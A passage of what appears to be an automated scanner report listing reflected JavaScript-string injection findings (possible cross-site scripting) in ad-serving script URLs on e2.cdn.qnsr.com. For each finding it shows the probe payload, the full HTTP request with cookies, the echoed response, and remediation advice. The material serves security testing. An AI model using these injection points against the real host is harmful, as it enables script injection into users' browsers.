Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 6112
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:46 GMT
Date: Sat, 26 Feb 2011 01:49:46 GMT
Connection: close


var zzADS_CHAN = '203687991f4d45';635acea8c54';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = zzPage_obj[zzADS_CHAN].zzTrd;

...[SNIP]...

3.196. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2e4c'%3b75866eeb8cb was submitted in the REST URL parameter 10. This input was echoed as a2e4c';75866eeb8cb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585/0/0/203687989/203687989//0/203a2e4c'%3b75866eeb8cb/9542//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:53 GMT
Date: Sat, 26 Feb 2011 01:49:53 GMT
Connection: close


var zzADS_CHAN = '203687989';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
anguage=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0,0%3Bc=203687989,203687989%3Bi=0%3Bn=203a2e4c';75866eeb8cb%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.197. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 11 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ec13'%3bb82047b1192 was submitted in the REST URL parameter 11. This input was echoed as 5ec13';b82047b1192 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/95425ec13'%3bb82047b1192//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2591945
Expires: Mon, 28 Mar 2011 01:49:03 GMT
Date: Sat, 26 Feb 2011 01:49:58 GMT
Connection: close


var zzADS_CHAN = '203687989';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0,0%3Bc=203687989,203687989%3Bi=0%3Bn=203%3Bs=95425ec13';b82047b1192%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.198. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 585a1'%3b1941ee17325 was submitted in the REST URL parameter 4. This input was echoed as 585a1';1941ee17325 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585585a1'%3b1941ee17325/0/0/203687989/203687989//0/203/9542//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2591996
Expires: Mon, 28 Mar 2011 01:49:28 GMT
Date: Sat, 26 Feb 2011 01:49:32 GMT
Connection: close


var zzADS_CHAN = '203687989';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585585a1';1941ee17325%3Bg=0,0%3Bc=203687989,203687989%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.199. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fde13'%3b899c01c4079 was submitted in the REST URL parameter 5. This input was echoed as fde13';899c01c4079 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585/0fde13'%3b899c01c4079/0/203687989/203687989//0/203/9542//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2591982
Expires: Mon, 28 Mar 2011 01:49:17 GMT
Date: Sat, 26 Feb 2011 01:49:35 GMT
Connection: close


var zzADS_CHAN = '203687989';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0fde13';899c01c4079,0%3Bc=203687989,203687989%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.200. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9129'%3b96c2477c71d was submitted in the REST URL parameter 6. This input was echoed as a9129';96c2477c71d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585/0/0a9129'%3b96c2477c71d/203687989/203687989//0/203/9542//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2591947
Expires: Mon, 28 Mar 2011 01:48:46 GMT
Date: Sat, 26 Feb 2011 01:49:39 GMT
Connection: close


var zzADS_CHAN = '203687989';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0,0a9129';96c2477c71d%3Bc=203687989,203687989%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.201. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59ed7'%3bde0cfbe8e7b was submitted in the REST URL parameter 7. This input was echoed as 59ed7';de0cfbe8e7b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585/0/0/20368798959ed7'%3bde0cfbe8e7b/203687989//0/203/9542//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1516
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:42 GMT
Date: Sat, 26 Feb 2011 01:49:42 GMT
Connection: close


var zzADS_CHAN = '20368798959ed7';de0cfbe8e7b';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = zzPage_obj[zzADS_CHAN].zzTrd;

...[SNIP]...

3.202. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 714d0'%3b84e7733cd79 was submitted in the REST URL parameter 8. This input was echoed as 714d0';84e7733cd79 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585/0/0/203687989/203687989714d0'%3b84e7733cd79//0/203/9542//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:45 GMT
Date: Sat, 26 Feb 2011 01:49:45 GMT
Connection: close


var zzADS_CHAN = '203687989';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0,0%3Bc=203687989,203687989714d0';84e7733cd79%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.203. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bc40'%3b05fa3e45893 was submitted in the REST URL parameter 9. This input was echoed as 5bc40';05fa3e45893 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585/0/0/203687989/203687989//05bc40'%3b05fa3e45893/203/9542//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2591966
Expires: Mon, 28 Mar 2011 01:49:14 GMT
Date: Sat, 26 Feb 2011 01:49:48 GMT
Connection: close


var zzADS_CHAN = '203687989';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0,0%3Bc=203687989,203687989%3Bi=05bc40';05fa3e45893%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.204. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41e20'%3b27304de4fd1 was submitted in the REST URL parameter 10. This input was echoed as 41e20';27304de4fd1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305/0/0/203687985/203687985//0/20341e20'%3b27304de4fd1/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1499
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:51 GMT
Date: Sat, 26 Feb 2011 01:49:51 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
nguage=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.6;sz=300x250;click0=http://o1.qnsr.com//cgi/c%3Fa=20142454%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985%3Bi=0%3Bn=20341e20';27304de4fd1%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.205. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 11 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cee84'%3bfb335840d2c was submitted in the REST URL parameter 11. This input was echoed as cee84';fb335840d2c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542cee84'%3bfb335840d2c//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
